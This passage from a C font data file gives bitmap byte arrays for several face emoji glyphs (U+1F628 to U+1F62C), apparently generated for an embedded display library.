0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x3, 0xe0, 0x0, 0x1, 0xf0,
0x1c, 0x0, 0x1c, 0xf, 0xf0, 0x0, 0x0, 0xff,
0x7, 0x0, 0x1e, 0x1f, 0x80, 0x0, 0x0, 0x7,
0xe3, 0xc0, 0xe, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x78, 0xe0, 0xe, 0xc, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x7, 0x80, 0x0,
0x1e, 0x0, 0x3, 0xb8, 0x0, 0x7, 0xe0, 0x0,
0x1f, 0x80, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x0, 0x7f, 0x80,
0x1, 0xfe, 0x0, 0x7, 0xe0, 0x0, 0x1f, 0x80,
0x0, 0x7e, 0x0, 0x3, 0xf0, 0x0, 0x7, 0x80,
0x0, 0x1e, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x1, 0xfe, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x3, 0xff, 0xc0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x7, 0xff, 0xf8, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x7, 0xff, 0xfe, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x7, 0xff, 0xff, 0x80, 0x0, 0xe0, 0x1c, 0x0,
0x3, 0xff, 0xff, 0xc0, 0x0, 0x70, 0x7, 0x0,
0x3, 0xff, 0xff, 0xf0, 0x0, 0x70, 0x3, 0xc0,
0x1, 0xff, 0xff, 0xf8, 0x0, 0x78, 0x0, 0xe0,
0x0, 0xff, 0xff, 0xfc, 0x0, 0x38, 0x0, 0x38,
0x0, 0x3f, 0xff, 0xfc, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x1f, 0xff, 0xfe, 0x0, 0x38, 0x0, 0x7,
0x80, 0x7, 0xe0, 0x7e, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F628 "😨" */
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0x19, 0xff, 0x80, 0x0,
0x0, 0x0, 0x7, 0xf9, 0x8c, 0xc7, 0xf0, 0x0,
0x0, 0x0, 0xf, 0xcc, 0xc6, 0x63, 0x7e, 0x0,
0x0, 0x0, 0x1f, 0xc6, 0x63, 0x31, 0x8f, 0x80,
0x0, 0x0, 0x1f, 0x63, 0x31, 0x98, 0xc5, 0xf0,
0x0, 0x0, 0x1f, 0x31, 0x98, 0xcc, 0x62, 0x3c,
0x0, 0x0, 0x1f, 0x98, 0xcc, 0x66, 0x31, 0x1f,
0x0, 0x0, 0x1e, 0xcc, 0x66, 0x33, 0x18, 0x8f,
0xc0, 0x0, 0x1e, 0x66, 0x33, 0x19, 0x8c, 0x46,
0xf0, 0x0, 0x1e, 0x33, 0x19, 0x8c, 0xc6, 0x23,
0x3c, 0x0, 0x1f, 0x19, 0xec, 0xc6, 0x63, 0xf1,
0x9f, 0x0, 0xf, 0x8f, 0xf6, 0x63, 0x31, 0xff,
0xcf, 0x80, 0xf, 0xcf, 0xe3, 0x31, 0x98, 0xc7,
0xe7, 0xe0, 0xf, 0x6f, 0x31, 0x98, 0xcc, 0x62,
0x7b, 0x78, 0x7, 0x37, 0x98, 0xcc, 0x66, 0x31,
0x1d, 0x9c, 0x7, 0x9a, 0xcc, 0x66, 0x33, 0x18,
0x8e, 0xcf, 0x3, 0xcc, 0x66, 0x33, 0x19, 0x8c,
0x46, 0x63, 0x83, 0xe6, 0x33, 0x19, 0x8c, 0xc6,
0x23, 0x31, 0xe1, 0xf3, 0x19, 0x8c, 0xc6, 0x63,
0x11, 0x98, 0xf0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x9c, 0x0, 0x3, 0xc0, 0x0,
0xf, 0x0, 0x1, 0xdc, 0x0, 0x3, 0xf0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x0, 0x7f, 0x80,
0x1, 0xfe, 0x0, 0x7, 0xe0, 0x0, 0x3f, 0xc0,
0x0, 0xff, 0x0, 0x3, 0xf0, 0x0, 0xf, 0xc0,
0x0, 0x3f, 0x0, 0x1, 0xf8, 0x0, 0x3, 0xc0,
0x0, 0xf, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x9c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc7, 0x0, 0x0,
0x0, 0xff, 0x0, 0x0, 0x1, 0xc3, 0x80, 0x0,
0x3, 0xff, 0xe0, 0x0, 0x0, 0xe0, 0xe0, 0x0,
0x3, 0xff, 0xfc, 0x0, 0x0, 0xe0, 0x70, 0x0,
0x3, 0xff, 0xff, 0x0, 0x0, 0x70, 0x1c, 0x0,
0x3, 0xff, 0xff, 0xc0, 0x0, 0x70, 0xe, 0x0,
0x3, 0xff, 0xff, 0xe0, 0x0, 0x38, 0x3, 0x80,
0x1, 0xff, 0xff, 0xf0, 0x0, 0x38, 0x1, 0xe0,
0x0, 0xff, 0xff, 0xf8, 0x0, 0x3c, 0x0, 0x70,
0x0, 0x7f, 0xff, 0xfc, 0x0, 0x1c, 0x0, 0x1c,
0x0, 0x3f, 0xff, 0xfe, 0x0, 0x1c, 0x0, 0x7,
0x0, 0xf, 0xff, 0xfe, 0x0, 0x1c, 0x0, 0x3,
0xc0, 0x3, 0xe0, 0x1e, 0x0, 0x1e, 0x0, 0x0,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x7c, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1, 0xf0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x80, 0xf, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0,
/* U+1F629 "😩" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x20, 0x0, 0x80, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x18, 0x0, 0xc0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x1c, 0x0, 0x70, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x1c, 0x0, 0x1c, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x1c, 0x0, 0x7, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x1c, 0x0, 0x1, 0xc0,
0x3, 0xc0, 0xe, 0x0, 0x1c, 0x0, 0x0, 0x70,
0x0, 0xe0, 0xe, 0x0, 0x3c, 0x0, 0x0, 0x1e,
0x0, 0x38, 0xf, 0x0, 0x3c, 0x0, 0x0, 0x7,
0x80, 0x1c, 0x7, 0x0, 0x8, 0x0, 0x0, 0x0,
0x80, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x1, 0x80, 0xc,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0xc0, 0x6,
0x0, 0x0, 0xe, 0x70, 0x0, 0x0, 0xe0, 0x3,
0x80, 0x0, 0x7, 0x38, 0x0, 0x0, 0x60, 0x0,
0xc0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x70, 0x0,
0x70, 0x0, 0x0, 0xfc, 0x0, 0x0, 0xf0, 0x0,
0x1e, 0x0, 0x0, 0x7e, 0x0, 0x1f, 0xf0, 0x0,
0x7, 0xfc, 0x0, 0x3f, 0x0, 0xf, 0xe0, 0x0,
0x0, 0xfe, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x1,
0xff, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x7,
0xff, 0xf0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0xf,
0x80, 0x3e, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x1e,
0x0, 0x3, 0xc0, 0x0, 0x1c, 0xe0, 0x0, 0x1c,
0x0, 0x0, 0x70, 0x0, 0xe, 0x70, 0x0, 0x18,
0x0, 0x0, 0xc, 0x0, 0x7, 0x38, 0x0, 0x18,
0x0, 0x0, 0x3, 0x0, 0x7, 0x8e, 0x0, 0xf,
0xff, 0xff, 0xff, 0x80, 0x3, 0x87, 0x0, 0xf,
0xff, 0xff, 0xff, 0xe0, 0x1, 0xc1, 0xc0, 0x7,
0xff, 0xff, 0xff, 0xf0, 0x1, 0xc0, 0xe0, 0x7,
0xff, 0xff, 0xff, 0xf8, 0x0, 0xe0, 0x78, 0x3,
0xff, 0xff, 0xff, 0xfe, 0x0, 0xe0, 0x1c, 0x1,
0xff, 0xff, 0xff, 0xff, 0x0, 0x70, 0x7, 0x0,
0xff, 0xff, 0xff, 0xff, 0x80, 0x70, 0x3, 0xc0,
0x7f, 0xff, 0xff, 0xff, 0xc0, 0x78, 0x0, 0xe0,
0x3f, 0xfe, 0x3, 0xff, 0xe0, 0x38, 0x0, 0x38,
0xf, 0xf0, 0x0, 0x1f, 0xe0, 0x38, 0x0, 0x1e,
0x7, 0xe0, 0x0, 0x3, 0xf0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F62A "😪" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0x80, 0xf, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x7,
0xc0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0xe, 0x0,
0x20, 0x0, 0x0, 0x3, 0x0, 0x38, 0x3, 0xc0,
0x3c, 0x0, 0x0, 0x0, 0x78, 0x7, 0x0, 0x70,
0x1f, 0x80, 0x0, 0x0, 0xf, 0xc0, 0x70, 0xe,
0xf, 0x80, 0x0, 0x0, 0x0, 0x3e, 0xe, 0x3,
0x83, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0xe0,
0x70, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1c,
0x1c, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe1,
0xc3, 0x82, 0x0, 0x0, 0x0, 0x0, 0x0, 0x8,
0x38, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xce, 0x0, 0x0, 0x4, 0x0, 0x10,
0x0, 0x0, 0x39, 0xc0, 0x1e, 0x1, 0xc0, 0x7,
0x0, 0xf0, 0x7, 0x38, 0x1, 0xe0, 0xf0, 0x0,
0x78, 0x3c, 0x0, 0xe7, 0x0, 0xf, 0xfc, 0x0,
0x7, 0xfe, 0x0, 0x1c, 0xe0, 0x0, 0x7e, 0x0,
0x0, 0x3f, 0x0, 0x3, 0x9c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x73, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0x81, 0xce, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xfe, 0x39, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x7c, 0x3, 0xfe, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0xf, 0xc3, 0x80,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x78, 0x70,
0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x7, 0xe,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x70,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x6,
0x1c, 0x0, 0x0, 0x3, 0xf8, 0xe, 0x0, 0x0,
0xe1, 0xc0, 0x0, 0x1, 0xff, 0xc0, 0xe0, 0x0,
0xc, 0x38, 0x0, 0x0, 0x7f, 0xfc, 0xc, 0x0,
0x1, 0x87, 0x80, 0x0, 0x1f, 0xff, 0xc1, 0xc0,
0x0, 0x38, 0x70, 0x0, 0x7, 0xff, 0xfc, 0x1c,
0x0, 0x7, 0x7, 0x0, 0x0, 0xff, 0xff, 0x81,
0x80, 0x0, 0xc0, 0xf0, 0x0, 0x1f, 0xff, 0xf0,
0x18, 0x0, 0x18, 0xe, 0x0, 0x3, 0xff, 0xfe,
0x3, 0x80, 0x3, 0x0, 0xe0, 0x0, 0x3f, 0xff,
0x80, 0x38, 0x0, 0xe0, 0x1e, 0x0, 0x2, 0x0,
0x0, 0x3, 0x80, 0x38, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0x1e, 0x0, 0x1e, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0x80, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xc0, 0x0, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0xf,
0x80, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xc0, 0x7, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xf0, 0x0, 0x0, 0x0,
/* U+1F62B "😫" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x20, 0x0, 0x20, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x38, 0x0, 0x38, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x78, 0x0, 0xf, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0xf8, 0x0, 0x3, 0xe0,
0x7, 0x0, 0x1e, 0x3, 0xf0, 0x0, 0x0, 0x7e,
0x3, 0xc0, 0xe, 0x3, 0xe0, 0x0, 0x0, 0xf,
0x80, 0xe0, 0xe, 0x1, 0x80, 0x0, 0x0, 0x0,
0xc0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0xf, 0x80, 0x0, 0x0,
0xf, 0x80, 0x3c, 0xe0, 0x7, 0xf8, 0x0, 0x0,
0x3f, 0xc0, 0xe, 0x70, 0x0, 0x3f, 0x0, 0x0,
0x7e, 0x0, 0x7, 0x38, 0x0, 0x3, 0xe0, 0x0,
0xf8, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x78, 0x0,
0xf0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0xfc, 0x0,
0x7e, 0x0, 0x0, 0x7e, 0x0, 0x1, 0xf8, 0x0,
0xf, 0xc0, 0x0, 0x3f, 0x0, 0x1, 0xe0, 0x0,
0x0, 0xf0, 0x0, 0x1f, 0x80, 0x3, 0xc0, 0x0,
0x0, 0x1e, 0x0, 0xf, 0xc0, 0x3, 0xc0, 0x0,
0x0, 0x7, 0x80, 0x7, 0xe0, 0x0, 0x80, 0x0,
0x0, 0x0, 0x80, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x1,
0xff, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x7,
0xff, 0xf0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0xf,
0x80, 0x3e, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x1e,
0x0, 0x3, 0xc0, 0x0, 0x1c, 0xe0, 0x0, 0x1c,
0x0, 0x0, 0x70, 0x0, 0xe, 0x70, 0x0, 0x18,
0x0, 0x0, 0xc, 0x0, 0x7, 0x38, 0x0, 0x18,
0x0, 0x0, 0x3, 0x0, 0x7, 0x8e, 0x0, 0xf,
0xff, 0xff, 0xff, 0x80, 0x3, 0x87, 0x0, 0xf,
0xff, 0xff, 0xff, 0xe0, 0x1, 0xc1, 0xc0, 0x7,
0xff, 0xff, 0xff, 0xf0, 0x1, 0xc0, 0xe0, 0x7,
0xff, 0xff, 0xff, 0xf8, 0x0, 0xe0, 0x78, 0x3,
0xff, 0xff, 0xff, 0xfe, 0x0, 0xe0, 0x1c, 0x1,
0xff, 0xff, 0xff, 0xff, 0x0, 0x70, 0x7, 0x0,
0xff, 0xff, 0xff, 0xff, 0x80, 0x70, 0x3, 0xc0,
0x7f, 0xff, 0xff, 0xff, 0xc0, 0x78, 0x0, 0xe0,
0x3f, 0xfe, 0x3, 0xff, 0xe0, 0x38, 0x0, 0x38,
0xf, 0xf0, 0x0, 0x1f, 0xe0, 0x38, 0x0, 0x1e,
0x7, 0xe0, 0x0, 0x3, 0xf0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F62C "😬" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0xf0, 0x0, 0x3,
0xc0, 0x0, 0xe1, 0xc0, 0x0, 0xfc, 0x0, 0x3,
0xf0, 0x0, 0x71, 0xc0, 0x0, 0xfe, 0x0, 0x1,
0xfc, 0x0, 0x3c, 0xe0, 0x0, 0x7f, 0x80, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xe0, 0x0,
0x1f, 0xc0, 0x0, 0xfc, 0x0, 0x3, 0xf0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x0, 0xf0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x1f, 0xff,
